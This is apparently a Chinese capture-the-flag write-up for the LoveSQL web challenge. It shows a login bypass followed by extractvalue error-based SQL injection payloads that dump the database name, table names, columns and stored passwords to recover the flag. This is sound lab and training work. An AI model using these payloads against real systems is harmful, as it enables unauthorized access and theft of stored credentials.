练习 16 Web [极客大挑战 2019]LoveSQL

extractvalue(1,concat('~', ('your sql') ) )报错注入,注意爆破字段的时候表名有可能是table_name不是table_schema

有登录输入框

常规尝试一下

常规的万能密码,返回了一个"admin的密码":

Hello admin!

Your password is 'f04b51f7f1de73ee7860c9eb023ea1c8'

没有任何有用信息

尝试报错注入 回顾 我的练习6

php 复制代码
extractvalue(1,concat('~',(select(database()))))%23
#完整后缀
/check.php
?username=admin
&password=f04b51f7f1de73ee7860c9eb023ea1c8 
'or extractvalue(1,concat('~',(select(database()))))%23

成功返回数据库名'geek'

那继续沿用爆表:

php 复制代码
#查表
select group_concat(table_name) from information_schema.tables where table_schema='geek'
#放到报错函数中
extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='geek')))%23

成功返回表名:应该是第二个用得上"l0ve1ysq1"

继续爆破字段:

这里还是要注意
最后是where table_name= 'l0ve1ysq1'
不是table_schema

php 复制代码
select group_concat(column_name) from information_schema.columns where table_schema=database()

# 这里还是要注意最后是where table_name='l0ve1ysq1',不是table_schema
extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1')))%23

成功,继续看一下内容

php 复制代码
select group_concat(password) fropm 'l0ve1ysq1' where id=1

extractvalue(1,concat('~',(select group_concat(password) from l0ve1ysq1 where id=1)))%23

这里一直尝试到id=16才找到flag 的一部分 '~flag{dba94064-c18c-4c85-8821-30'

id=17是无效的

所以也需要用到right函数显示后半部分 right(password,30)

php 复制代码
extractvalue(1,concat('~',(select group_concat(right(password,30) )from l0ve1ysq1 where id=16)))%23
php 复制代码
'~4-c18c-4c85-8821-301279f9a32a}'

拼接一下即可: flag{dba94064-c18c-4c85-8821-301279f9a32a}

End

相关推荐
梨子同志9 分钟前
Next.js
前端
谭光志19 分钟前
工具塞满上下文窗口怎么办?深度拆解 AI Agent Tool Search 按需加载实现原理
前端·后端·ai编程
shushangyun_20 分钟前
2026智能采购商城系统选型指南:如何引领企业数字化采购升级
java·大数据·数据库·人工智能·机器学习
Hilaku21 分钟前
前端架构师的克制:什么时候该坚决对新技术说不?
前端·javascript·程序员
陈随易1 小时前
前端项目部署只要30秒
前端·后端·程序员
本末倒置1831 小时前
从 Vue CLI 迁移到 Rsbuild 后,JSX 突然全挂了?一次排查记录
前端
古夕1 小时前
多应用同域部署下 Favicon 异常问题排查与治理
前端·javascript
YIAN1 小时前
从零手写文件读取 MCP 服务:一文吃透 Model Context Protocol 全链路通信原理
前端·后端·mcp
Imchendiana1 小时前
《狂人日记NO.9》— 前后端一把梭,我的全栈实录
前端·后端
逍遥运德1 小时前
前端工程化-03:包管理NPM-package.json 和 package-lock.json 详解
前端·前端框架·前端工程化